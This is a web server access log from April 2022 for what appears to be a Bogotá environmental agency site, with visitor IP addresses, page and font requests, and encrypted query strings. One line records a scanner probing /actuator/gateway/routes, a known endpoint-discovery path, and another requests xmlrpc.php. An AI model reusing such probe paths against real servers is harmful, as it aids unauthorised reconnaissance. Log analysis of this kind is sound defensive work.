190.144.26.126 - - [23/Apr/2022:11:24:38 -0500] "GET /Autoliquidacion/dlf/xls.gif HTTP/1.1" 200 636
190.144.26.126 - - [23/Apr/2022:11:24:38 -0500] "GET /Autoliquidacion/dlf/html.gif HTTP/1.1" 200 632
190.144.26.126 - - [23/Apr/2022:11:24:42 -0500] "GET /Autoliquidacion/Permiso%20de%20ocupaci%C3%B3n%20de%20cauce/Aplicativo.html HTTP/1.1" 200 359
157.55.39.211 - - [23/Apr/2022:11:25:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 124684
157.55.39.211 - - [23/Apr/2022:11:25:34 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 124684
172.22.2.4 - - [23/Apr/2022:11:26:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [23/Apr/2022:11:25:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [23/Apr/2022:11:27:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Apr/2022:11:26:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51004
172.22.2.4 - - [23/Apr/2022:11:27:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
186.102.42.164 - - [23/Apr/2022:11:28:26 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1862VZCnX4V+y9iY+s7H0ohU9eVkY3pcXOBK9ZVY1d2Z/tRgb2kycQJIW7W8XCrMA178fOWggutLApTLHgVvGqW1WhpEg91cozLPMef36fa2vpRBy2YrVYNEvXgij/RhyolurHCBkljuinCVx7wgg7PNP/tBTOO2NhLf9yGpYcXhgiTqTdZxURJBm7yEoJWjiBbG6BEkk2u4p7VOGJwQxnC1dzVpigDTCSV1x0U8POwgYqqUYxkZhd2J/QSOgyWqtRARvWTNuxpcg==&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:11:28:27 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:11:28:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ZtWO80A17+KvFIfaswanXLpvxgcr7lc/LJrvTCI/PElTpk0WuOfX/G168gpM63wCvjQchsiJGiUK2FyI3iNCaO+z6l50hEn13sGZ1rCAGOcvvT5h+KiqOUnEybz10b8LSVUaIrKlBCL6K9OQMpOLEEsQQe7Yc7Y8=&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:11:28:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18JVxD+fChVMZrCr+3ZVUUpfx8q1Up4ivmpW7d+nfpdisa/VMH9Ztg3KA1bh4NYPbqo5bHw6ClGeMA/0sBQFmLe2dUYukCa2f4Ag+nksmF+X/QSJNTUJcnEgN/sW/5Vw8SgPUTJz7jUXFXfb2R1J4vS+XPKcumh2Ek=&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:11:28:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18+1zV3Tu0td5HrecKh6OcYBvuUNMwedF2Gm5DuqDu7jYWocgQxqWNjbmrON7Nzt7a42M/LMFE7VOzd9c4uy0pt0Yzfgfb/r0Oyv2LGiVxtSw5SA8ItC0L7DOWEby2r0Gl5OB6zW7hE2i0meLSyqDmhDR/1371zi2g=&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
186.102.42.164 - - [23/Apr/2022:11:28:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19bX/mLF1/rDsSFqJOE8V/K4/JfqT/MDJnUYQzintUa6nMJFZnUAmadQJLTDP0YN17JWv5a4BxDZByOGZy2PQuQ+jAM/L2HPU69NuOvu++8m8HgKxlWIlKYyrBOSxLtSCLMNA+djINyo/OwxIXAWXloEW7MaU8aJYIRwwCgjc/l5+z1ReW/ViVmJNKkqglfRDz0hfZbtQIZBQ==&u=U2FsdGVkX18MOeYx2DtnayiGhlch9TUv+SCubnDAMtcoWIp2TbKoabbTjXIZcJ40&y=U2FsdGVkX1+mhkP3UynsxOokc2HoTXIRdQv+xhF0nrNQVnIekSEGi8IzZ91jiuAm HTTP/1.1" 200 25
45.155.204.146 - - [23/Apr/2022:11:28:41 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
34.86.177.154 - - [23/Apr/2022:11:29:51 -0500] "-" 408 -
66.249.65.13 - - [23/Apr/2022:11:30:01 -0500] "-" 408 -
172.22.2.4 - - [23/Apr/2022:11:30:09 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 304 -
40.77.190.142 - - [23/Apr/2022:11:31:25 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
199.59.150.182 - - [23/Apr/2022:11:32:20 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
216.245.221.92 - - [23/Apr/2022:11:32:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Apr/2022:11:32:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42639
172.22.2.4 - - [23/Apr/2022:11:31:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Apr/2022:11:33:12 -0500] "GET /BLA/boletinlegal/xmlrpc.php HTTP/1.1" 404 1038
201.245.192.253 - - [23/Apr/2022:11:32:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46106
172.22.2.4 - - [23/Apr/2022:11:32:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
186.85.145.15 - - [23/Apr/2022:11:35:58 -0500] "-" 408 -
186.83.49.194 - - [23/Apr/2022:11:37:09 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.88.172.152 - - [23/Apr/2022:11:37:43 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
216.245.221.92 - - [23/Apr/2022:11:37:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Apr/2022:11:37:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Apr/2022:11:38:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
186.83.0.39 - - [23/Apr/2022:11:40:08 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
216.245.221.92 - - [23/Apr/2022:11:42:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Apr/2022:11:42:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42639
